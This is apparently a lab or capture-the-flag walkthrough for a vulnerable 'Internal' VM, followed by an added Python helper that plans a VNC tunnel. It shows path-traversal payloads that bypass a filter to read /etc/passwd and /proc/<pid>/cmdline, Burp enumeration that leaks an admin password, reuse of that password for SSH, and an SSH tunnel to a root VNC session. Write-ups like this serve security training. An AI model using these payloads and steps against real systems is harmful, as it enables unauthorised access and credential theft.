# Lab setup
Download: Internal
NAT, IP: 192.168.1.166
# Penetration process
# Initial information gathering
```
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.1.166
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 09:27 EDT
Nmap scan report for 192.168.1.166
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Day Bootstrap Template - Index
9999/tcp open  abyss?
```
On port 80, inspecting the page source reveals a file-inclusion parameter. Fuzzing it shows that the plain `../` form is blocked but `....//` gets through, which is the classic sign of a filter that strips `../` in a single pass (each `....//` collapses to `../` after the strip). This payload includes /etc/passwd: http://192.168.1.166/internal-item.php?item=....//....//....//etc/passwd
Notable users in /etc/passwd: root and admin.
Include the process's own command line: http://192.168.1.166/internal-item.php?item=....//....//....//proc/self/cmdline
/proc/self is a symbolic link to the process reading it, so /proc/self/cmdline is the command line of the current process, here the PHP worker performing the include. The arguments are separated by NUL bytes (ASCII 0), not spaces, and the last argument is NUL-terminated as well; browsers do not render NULs, so the arguments appear run together when the file is shown in a page. The file reveals how a running program was started, including any arguments passed on its command line.
Now enumerate other PIDs (Burp Intruder, with §1§ marking the payload position):
```
GET /internal-item.php?item=....//....//....//proc/§1§/cmdline HTTP/1.1
Host: 192.168.1.166
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
```
Payloads: the numbers 1 to 10000. Several responses leak information; the key one:
```
HTTP/1.1 200 OK
Date: Wed, 29 May 2024 15:09:37 GMT
Server: Apache/2.4.56 (Debian)
Vary: Accept-Encoding
Content-Length: 100
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<pre>
python3/home/admin/python3HTTPSAuthServer.py--port9999--authadmin:4dM1Nt3rN4LP4zZ
</pre>
```
That is a credential: admin/4dM1Nt3rN4LP4zZ, the --auth argument of the Python HTTP server on port 9999 (the NUL separators between arguments are dropped by the browser, which is why the line reads as one word). Go straight to port 9999 and log in.
The page after login looks very familiar.
The same credentials also work over SSH, so there is no need to look further at port 9999.
# Privilege escalation
In the user's home directory ...
the folder contains a zip that asks for a password on extraction; it is the same one as above: 4dM1Nt3rN4LP4zZ
It extracts to a file named passwd.
ps -ef shows a VNC server has been started:
```
/usr/bin/Xtigervnc :1 -rfbport 5901 -localhost=1 -SecurityTypes VncAuth -PasswordFile /root/.vnc/passwd -ClientWaitTimeMillis 30000 -geometry 1920x1200 -deskto
```
The -PasswordFile it uses is exactly the passwd just extracted, so connect straight to it. Because the server was started with -localhost=1, port 5901 is bound to 127.0.0.1 on the target only, so it has to be reached through a tunnel.
Build the tunnel over SSH, mapping the target's 5901 to the same port locally: ssh -N -L 5901:127.0.0.1:5901 admin@192.168.1.166
Then connect with the extracted password file and land on a root desktop: vncviewer 127.0.0.1::5901 -passwd passwd
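As an added example (not part of the original write-up), the following Python reads `ps -ef` output, picks out VNC server processes, parses their options, and decides how to reach them: with `-localhost=1` the rfb port is bound to 127.0.0.1 on the target, so an SSH port forward is required, and `-PasswordFile` identifies which file the extracted `passwd` has to correspond to. The `ps` sample is constructed to mirror the process found above; the SSH user and host placed in the generated command, and the treatment of a missing `-localhost` as remotely reachable, are assumptions.

```python
#!/usr/bin/env python3
"""Find VNC servers in `ps -ef` output and work out how to reach them.

Added example, not part of the original write-up. SAMPLE_PS is constructed
to mirror the Xtigervnc process found on the box; the SSH user/host used
for the tunnel (admin@192.168.1.166) are assumed from the text.
"""
import shlex
from typing import Any, Dict, List

# Constructed `ps -ef` sample; the Xtigervnc line matches the one quoted above.
SAMPLE_PS = """\
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 09:00 ?        00:00:01 /sbin/init
root         612       1  0 09:00 ?        00:00:00 /usr/bin/Xtigervnc :1 -rfbport 5901 -localhost=1 -SecurityTypes VncAuth -PasswordFile /root/.vnc/passwd -ClientWaitTimeMillis 30000 -geometry 1920x1200
admin        901     880  0 09:01 pts/0    00:00:00 ps -ef
"""


def parse_vnc_args(cmd: str) -> Dict[str, str]:
    """Parse Xvnc/Xtigervnc options: ':N' display, '-flag value', '-flag=value', bare '-flag' (-> '1')."""
    toks = shlex.split(cmd)
    opts: Dict[str, str] = {"argv0": toks[0]}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith(":"):                      # X display, e.g. ':1'
            opts["display"] = tok
        elif tok.startswith("-"):
            key, has_eq, val = tok.lstrip("-").partition("=")
            if has_eq:
                opts[key] = val
            elif i + 1 < len(toks) and not toks[i + 1].startswith("-"):
                opts[key] = toks[i + 1]             # value given as the next token
                i += 1
            else:
                opts[key] = "1"                      # bare boolean flag
        i += 1
    return opts


def find_vnc_servers(ps_output: str) -> List[Dict[str, str]]:
    """Return the parsed options of every *vnc* process in `ps -ef` output (header line skipped)."""
    found = []
    for line in ps_output.splitlines()[1:]:
        fields = line.split(None, 7)                 # CMD is the 8th column and may contain spaces
        if len(fields) < 8:
            continue
        cmd = fields[7]
        if "vnc" in cmd.split()[0].lower():
            opts = parse_vnc_args(cmd)
            opts["pid"] = fields[1]
            found.append(opts)
    return found


def tunnel_plan(opts: Dict[str, str], ssh_target: str = "admin@192.168.1.166",
                host: str = "192.168.1.166") -> Dict[str, Any]:
    """Derive the rfb port and, for a localhost-only listener, the SSH forward needed to reach it."""
    port = opts.get("rfbport") or str(5900 + int(opts.get("display", ":0")[1:]))
    # Assumption: without -localhost the listener is reachable remotely; '-localhost=1' or bare '-localhost' is not.
    local_only = opts.get("localhost", "0").lower() not in ("0", "no", "false")
    return {
        "port": port,
        "local_only": local_only,
        "password_file": opts.get("PasswordFile"),
        "ssh": f"ssh -N -L {port}:127.0.0.1:{port} {ssh_target}" if local_only else None,
        "viewer": f"vncviewer {'127.0.0.1' if local_only else host}::{port} -passwd passwd",
    }


if __name__ == "__main__":
    for srv in find_vnc_servers(SAMPLE_PS):
        plan = tunnel_plan(srv)
        print(f"pid {srv['pid']} display {srv.get('display')} port {plan['port']} "
              f"password file {plan['password_file']} tunnel required: {plan['local_only']}")
        if plan["ssh"]:
            print(plan["ssh"])
        print(plan["viewer"])
```

Run as-is it reproduces the two commands used above for the sample process; on a real box pipe `ps -ef` output into `find_vnc_servers` instead of `SAMPLE_PS`.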